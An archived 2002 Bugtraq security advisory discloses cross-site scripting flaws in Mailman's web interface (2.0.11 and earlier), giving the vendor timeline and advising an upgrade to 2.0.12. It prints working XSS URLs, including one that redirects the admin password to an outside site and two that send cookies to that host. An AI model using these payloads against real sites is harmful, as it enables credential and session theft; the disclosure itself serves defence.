Home page logo
/

bugtraq logo Bugtraq mailing list archives

cross-site scripting bug of Mailman
From: office <office () office ac>
Date: Wed, 24 Jul 2002 17:03:30 +0900

Mailman: cross-site scripting bug

Product: Mailman
Affected Version: 2.0.11 and under it
Vendor's URL: http://www.gnu.org/software/mailman/
Solution: Use fixed version 2.0.12 or later


Introduction:
------------
Mailman is software to help manage electronic mail discussion lists, much 
like Majordomo or Smartmail. And Mailman have web interface system.


Example:
-----------------
This is simple example for version 2.0.10:
You can recognize the vulnerability with this type of URL;
http://mailman_site/mailman_dirctory/admin/ml-name?";><script>alert("hello")</script>
and that prove that any (malicious) script code is possible on web 
interface part of Mailman.


For example, if you access to this URL with Internet Explorer (other 
browser is not affected by the URL), the page figure is similar to 
real one, but the password of admin you enter and submit are send 
to another malicious site (http://www.office.ac/). This URL are valid for version 2.0.10.

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw=";></form><form/action="http://www.office.ac/webform.cgi"/method="post";><br


And Mailman 2.0.11 still have vulnerabilities, if you access to these 
URL with Internet Explorer (other browser is not affected by these 
URL), your information in cookie about the mailman_site could be 
send another malicious site (http://www.office.ac/).

http://mailman_site/mailman_dirctory/admin/ml-name?adminpw="/onClick="window.open('http://www.office.ac/j.cgi?'+document.cookie);

http://mailman_site/mailman/subscribe/ml-name?info=<script>document.location%3D"http://www.office.ac/j.cgi?"%2Bdocument.cookie;</script>


Vendor's response:
--------------
The vendor were notified about first problem on 20th of May 2002. 
On same 20th May 2002, version 2.0.11 was released.
http://mail.python.org/pipermail/mailman-announce/2002-May/000042.html

And the vendor were notified about other problems on 21st of May 2002. 
The fixed version 2.0.12 was released on 11th of Jul 2002.
http://mail.python.org/pipermail/mailman-announce/2002-July/000043.html


Solution:
--------------
Users should upgrade to Mailman 2.0.12 or later

--
office
office () ukky net
office () office ac
http://www.office.ac/


  By Date           By Thread  

Current thread:
  • cross-site scripting bug of Mailman office (Jul 24)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault